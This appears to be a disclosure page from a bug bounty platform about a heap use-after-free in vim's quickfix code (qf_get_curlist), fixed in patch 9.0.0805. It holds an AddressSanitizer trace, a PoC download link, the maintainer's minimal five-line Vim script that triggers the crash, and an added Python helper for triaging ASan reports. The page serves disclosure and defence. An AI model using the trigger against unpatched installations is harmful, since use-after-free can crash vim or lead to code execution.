Use After Free in function qf_get_curlist in vim/vim

Valid

Reported on

Oct 19th 2022


Description

Use After Free in function qf_get_curlist at quickfix.c:1932.

vim version

git log
commit bf72e0c67f26ea7c8fd941fdd1533c24c7b6cb43 (grafted, HEAD -> master, tag: v9.0.0792, origin/master, origin/HEAD)

Proof of Concept

./vim -u NONE -i NONE -n -m -X -Z -e -s -S /home/fuzz/test/poc14_huaf.dat -c :qa!
=================================================================
==147326==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00005be88 at pc 0x55f4ac3e895f bp 0x7ffe39fa57b0 sp 0x7ffe39fa57a0
READ of size 4 at 0x61b00005be88 thread T0
    #0 0x55f4ac3e895e in qf_get_curlist /home/fuzz/vim/src/quickfix.c:1932
    #1 0x55f4ac3f4422 in qf_win_pos_update /home/fuzz/vim/src/quickfix.c:4446
    #2 0x55f4ac3f4f99 in qf_update_buffer /home/fuzz/vim/src/quickfix.c:4609
    #3 0x55f4ac3f1e4a in qf_age /home/fuzz/vim/src/quickfix.c:3902
    #4 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #5 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #6 0x55f4ac60adaa in do_ucmd /home/fuzz/vim/src/usercmd.c:1912
    #7 0x55f4ac17be2c in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2571
    #8 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #9 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #10 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #11 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #12 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #13 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #14 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #15 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #16 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    [frames #17 through #250 repeat the five frames above (do_one_cmd, do_cmdline, do_source_ext, cmd_source, ex_source) because the PoC script sources itself recursively]

0x61b00005be88 is located 8 bytes inside of 1464-byte region [0x61b00005be80,0x61b00005c438)
freed by thread T0 here:
    #0 0x7f862ee4340f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122
    #1 0x55f4abfed596 in vim_free /home/fuzz/vim/src/alloc.c:615
    #2 0x55f4ac3e91ab in ll_free_all /home/fuzz/vim/src/quickfix.c:2049
    #3 0x55f4ac4023ee in qf_free_stack /home/fuzz/vim/src/quickfix.c:7714
    #4 0x55f4ac4024b6 in set_errorlist /home/fuzz/vim/src/quickfix.c:7750
    #5 0x55f4ac40612e in set_qf_ll_list /home/fuzz/vim/src/quickfix.c:8560
    #6 0x55f4ac4062a9 in f_setloclist /home/fuzz/vim/src/quickfix.c:8589
    #7 0x55f4ac111208 in call_internal_func /home/fuzz/vim/src/evalfunc.c:3049
    #8 0x55f4ac621a2d in call_func /home/fuzz/vim/src/userfunc.c:3681
    #9 0x55f4ac6181b9 in get_func_tv /home/fuzz/vim/src/userfunc.c:1841
    #10 0x55f4ac62dd32 in ex_call_inner /home/fuzz/vim/src/userfunc.c:5647
    #11 0x55f4ac62fb45 in ex_call /home/fuzz/vim/src/userfunc.c:5971
    #12 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #13 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #14 0x55f4ac001c18 in apply_autocmds_group /home/fuzz/vim/src/autocmd.c:2232
    #15 0x55f4ac000401 in apply_autocmds /home/fuzz/vim/src/autocmd.c:1710
    #16 0x55f4ac3a3fce in did_set_string_option /home/fuzz/vim/src/optionstr.c:2540
    #17 0x55f4ac399413 in set_string_option /home/fuzz/vim/src/optionstr.c:538
    #18 0x55f4ac38203f in set_option_value /home/fuzz/vim/src/option.c:4378
    #19 0x55f4ac382284 in set_option_value_give_err /home/fuzz/vim/src/option.c:4423
    #20 0x55f4ac3f61df in qf_fill_buffer /home/fuzz/vim/src/quickfix.c:4855
    #21 0x55f4ac3f4f31 in qf_update_buffer /home/fuzz/vim/src/quickfix.c:4604
    #22 0x55f4ac3f1e4a in qf_age /home/fuzz/vim/src/quickfix.c:3902
    #23 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #24 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #25 0x55f4ac60adaa in do_ucmd /home/fuzz/vim/src/usercmd.c:1912
    #26 0x55f4ac17be2c in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2571
    #27 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #28 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #29 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146

previously allocated by thread T0 here:
    #0 0x7f862ee43808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #1 0x55f4abfed2aa in lalloc /home/fuzz/vim/src/alloc.c:246
    #2 0x55f4abfed140 in alloc_clear /home/fuzz/vim/src/alloc.c:177
    #3 0x55f4abfed1e1 in alloc_clear_id /home/fuzz/vim/src/alloc.c:193
    #4 0x55f4ac3e9cec in qf_alloc_stack /home/fuzz/vim/src/quickfix.c:2233
    #5 0x55f4ac40231d in qf_free_stack /home/fuzz/vim/src/quickfix.c:7707
    #6 0x55f4ac4024b6 in set_errorlist /home/fuzz/vim/src/quickfix.c:7750
    #7 0x55f4ac40612e in set_qf_ll_list /home/fuzz/vim/src/quickfix.c:8560
    #8 0x55f4ac4062a9 in f_setloclist /home/fuzz/vim/src/quickfix.c:8589
    #9 0x55f4ac111208 in call_internal_func /home/fuzz/vim/src/evalfunc.c:3049
    #10 0x55f4ac621a2d in call_func /home/fuzz/vim/src/userfunc.c:3681
    #11 0x55f4ac6181b9 in get_func_tv /home/fuzz/vim/src/userfunc.c:1841
    #12 0x55f4ac62dd32 in ex_call_inner /home/fuzz/vim/src/userfunc.c:5647
    #13 0x55f4ac62fb45 in ex_call /home/fuzz/vim/src/userfunc.c:5971
    #14 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #15 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #16 0x55f4ac001c18 in apply_autocmds_group /home/fuzz/vim/src/autocmd.c:2232
    #17 0x55f4ac000401 in apply_autocmds /home/fuzz/vim/src/autocmd.c:1710
    #18 0x55f4ac3a3fce in did_set_string_option /home/fuzz/vim/src/optionstr.c:2540
    #19 0x55f4ac399413 in set_string_option /home/fuzz/vim/src/optionstr.c:538
    #20 0x55f4ac38203f in set_option_value /home/fuzz/vim/src/option.c:4378
    #21 0x55f4ac382284 in set_option_value_give_err /home/fuzz/vim/src/option.c:4423
    #22 0x55f4ac3f61df in qf_fill_buffer /home/fuzz/vim/src/quickfix.c:4855
    #23 0x55f4ac3f3eea in ex_copen /home/fuzz/vim/src/quickfix.c:4372
    #24 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #25 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #26 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #27 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #28 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #29 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578

SUMMARY: AddressSanitizer: heap-use-after-free /home/fuzz/vim/src/quickfix.c:1932 in qf_get_curlist
==147326==ABORTING

PoC download URL: https://github.com/Janette88/vim/blob/main/poc14_huaf.dat
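A triage helper, added here as an example and not part of the report or of vim: it parses an ASan heap-use-after-free report like the one above, folds the frames that the self-sourcing script repeats into a single cycle, and derives a crash signature from the faulting frames plus the first non-wrapper free frame. The embedded report is a constructed, abridged copy of the output above; the section markers and frame format are the ones ASan prints.

```python
import re
from collections import namedtuple
Frame = namedtuple("Frame", "func file line")

# Constructed sample: abridged copy of the report above (one 5-frame cycle kept twice).
SAMPLE = """\
==147326==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00005be88 at pc 0x55f4ac3e895f bp 0x7ffe39fa57b0 sp 0x7ffe39fa57a0
READ of size 4 at 0x61b00005be88 thread T0
    #0 0x55f4ac3e895e in qf_get_curlist /home/fuzz/vim/src/quickfix.c:1932
    #1 0x55f4ac3f4422 in qf_win_pos_update /home/fuzz/vim/src/quickfix.c:4446
    #2 0x55f4ac3f4f99 in qf_update_buffer /home/fuzz/vim/src/quickfix.c:4609
    #12 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #13 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #14 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #15 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #16 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #17 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
    #18 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #19 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #20 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
    #21 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189

freed by thread T0 here:
    #0 0x7f862ee4340f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122
    #2 0x55f4ac3e91ab in ll_free_all /home/fuzz/vim/src/quickfix.c:2049
    #6 0x55f4ac4062a9 in f_setloclist /home/fuzz/vim/src/quickfix.c:8589

previously allocated by thread T0 here:
    #0 0x7f862ee43808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #4 0x55f4ac3e9cec in qf_alloc_stack /home/fuzz/vim/src/quickfix.c:2233
"""

HEADER_RE = re.compile(r"^==\d+==ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-f]+)")
FRAME_RE = re.compile(r"^\s*#\d+\s+0x[0-9a-f]+\s+in\s+(\S+)\s+(\S+?):(\d+)")
SECTIONS = {"READ of": "access", "WRITE of": "access",
            "freed by": "freed", "previously allocated by": "allocated"}

def parse_asan(text):
    """Split an ASan report into error kind, faulting address and its three stacks."""
    report = {"kind": None, "address": None, "access": [], "freed": [], "allocated": []}
    current = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            report["kind"], report["address"] = m.groups()
            continue
        for marker, key in SECTIONS.items():
            if line.startswith(marker):
                current = key
        m = FRAME_RE.match(line)
        if m and current:
            func, path, lineno = m.groups()
            report[current].append(Frame(func, path.rsplit("/", 1)[-1], int(lineno)))
    return report

def collapse_cycles(frames, min_repeats=2):
    """Fold consecutive repeats of a frame cycle into (cycle, count) pairs."""
    # A self-sourcing script yields hundreds of identical frames that defeat top-N-frame deduplication.
    out, i = [], 0
    while i < len(frames):
        for length in range(1, (len(frames) - i) // min_repeats + 1):
            cycle, reps = frames[i:i + length], 1
            while frames[i + reps * length:i + (reps + 1) * length] == cycle:
                reps += 1
            if reps >= min_repeats:
                out.append((cycle, reps))
                i += reps * length
                break
        else:
            out.append(([frames[i]], 1))
            i += 1
    return out

def crash_signature(report, depth=3):
    """Top frames of the faulting stack plus the first non-wrapper free frame."""
    flat = [f.func for cycle, _ in collapse_cycles(report["access"]) for f in cycle]
    freed = [f.func for f in report["freed"] if not f.func.startswith("__interceptor_")]
    return "%s:%s:%s" % (report["kind"], "/".join(flat[:depth]), freed[0] if freed else "?")
```

On the full report from this page the same code folds frames #12 through #250 into one five-frame cycle, so the signature stays stable however deep the recursion went.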

Impact

Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

We are processing your report and will contact the vim team within 24 hours. 2 months ago
We have contacted a member of the vim team and are waiting to hear back 2 months ago
Bram Moolenaar
2 months ago

Maintainer


I can reproduce it, but the POC is much too complicated. The first line isn't needed and instead of the script sourcing itself (leading to recursive execution) just doing it twice is sufficient. And then some lines can be dropped:

    lexpr ''
    lopen
    au FileType * call setloclist(0, [], 'f')
    lolder
    lexpr ''

Bram Moolenaar
a month ago

Maintainer


Fixed with patch 9.0.0805

Bram Moolenaar validated this vulnerability a month ago
janette88 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Bram Moolenaar marked this as fixed in 9.0.0805 with commit d0fab1 a month ago
Bram Moolenaar has been awarded the fix bounty
This vulnerability will not receive a CVE
janette88
a month ago

Researcher


@admin Can I get a CVE for this bug report?

Ben Harvie
a month ago

Admin


Hi, the maintainer now has control over CVE publication at the "Publish" stage of the report.

janette88
a month ago

Researcher


see..... I'd thought the admin missed the CVE assignment because the bug could be reproduced and the PoC was applicable @admin.

Pavlos published this vulnerability 3 days ago